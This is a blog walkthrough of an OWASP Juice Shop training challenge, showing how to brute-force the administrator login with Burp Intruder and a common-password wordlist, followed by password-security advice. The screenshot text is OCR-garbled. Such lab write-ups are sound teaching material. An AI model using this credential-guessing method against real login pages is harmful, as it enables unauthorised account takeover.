Pwning OWASP’s Juice Shop Pt. 19: Password Strength

Challenge: 

Name: Password Strength

Description: Log in with the administrator’s user credentials without previously changing them or applying SQL Injection.

Difficulty: 2 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

Burp, FoxyProxy

Resources used:

None

Methodology: 

If we’re trying to guess the admin’s password without any SQL trickery, then Burp’s Intruder Sniper attack is the first thing that pops into my head. Set up Burp and FoxyProxy to capture a login packet, then send that packet to Intruder and set up your Sniper attack.

Dashboard 
Target 
Proxy 
rud 
Options 
Repeater 
Sequencer 
Decoder 
Comparer 
Extender 
Project optior 
Position s Payloads 
Target 
O Payload Positions 
Configure the positions where payloads will be inserted into the base request The attack type determines the way in 
Attack type Sniper 
1 POST /rest/user/login HTTP/I.I 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, 
4 Accept 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
7 Content -Type: application/ j son 
Content -Length: 47 
Origin: http• 
// I Ocal host 3000 
10 Connection: close 
Referer: http://localhost : 3000/ 
rv.78.o) 
Gecko,'20100101 Firefox,'78.o 
12 ICook1e: language=en; welcomebanner status=dismiss; 
password" "Stet S"} 
'admin@j uice-sh.op' , 
cookieconsent 
status=dismiss, 
continueC

Now for the complicated part: finding a password list with common passwords, but without resorting to RockYou.txt. The one which made the most sense to me was located in /usr/share/wordlists/fern-wifi. The “common.txt” wordlist there seemed to have a number of potentially easy-to-guess passwords with an emphasis on administrator accounts.

File Edit 
aaa 
abC1231 
acc 
access 
adfexc 
adm 
admin 
admin123 
admin2 
admin 1 
Search 
View 
Document 
Help 
administrator 
adminstat 
adminstrator 
adminttd 
adminuser 
adminview 
admn 
adslolitec 
adslroot

Copy/paste the contents of the wordlist to Intruder’s Payload tab and wait for a 200 status code. Don’t worry, you won’t be waiting long.

Attack Save Columns 
Results Target 
Positions 
Filter: Showing all items 
Payloads 
Requ 
Payload 
abc123 
access 
adfexc 
adm 
admin 
acImin12S 
admin2 
admin I 
administrator 
adminstat 
adminstrator 
Options 
Status 
401 
401 
Error 
o 
o 
o 
o 
o 
o 
o 
o 
o 
o 
o 
o 
Timeout 
o 
o 
o 
o 
o 
o 
o 
o 
o 
o 
o 
o 
Length 
Comment 
Contains

Now log in and enjoy your full administrator privileges!

Prevention and mitigation strategies:

OWASP Mitigation Cheat Sheet

Take password security seriously. If you absolutely must share your passwords with someone else (spouse, shifty stranger, etc), then do not send it SMS, Email, or any other electronic medium without first encrypting the file. Generating and using an RSA key pair is a pain (not to mention getting the other person to do it), but it beats having your identity stolen.

Use unique passwords for every account you have. When I took my first security course a year ago I was one of those people who reused a few passwords over and over. Today I carry a cipher with me everywhere I go (qwertycards.com has credit card-sized unique ciphers for $5), and to keep myself from forgetting any of the dozen different password character restrictions I’ve encountered, I store all of my passwords in a password manager.

Password managers aren’t 100% secure (nothing is), either. But someone has to seriously want your passwords to use tools like KeeFarce, for KeePass2.x, successfully.

Lessons Learned and Things Worth Mentioning: 

  1. Nothing, really. I’ve done this a few dozen times.
  2. Ideally I’d have used Hydra, but rather than explaining the syntax and what it actually does, this approach was serviceable and led to the desired outcome.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s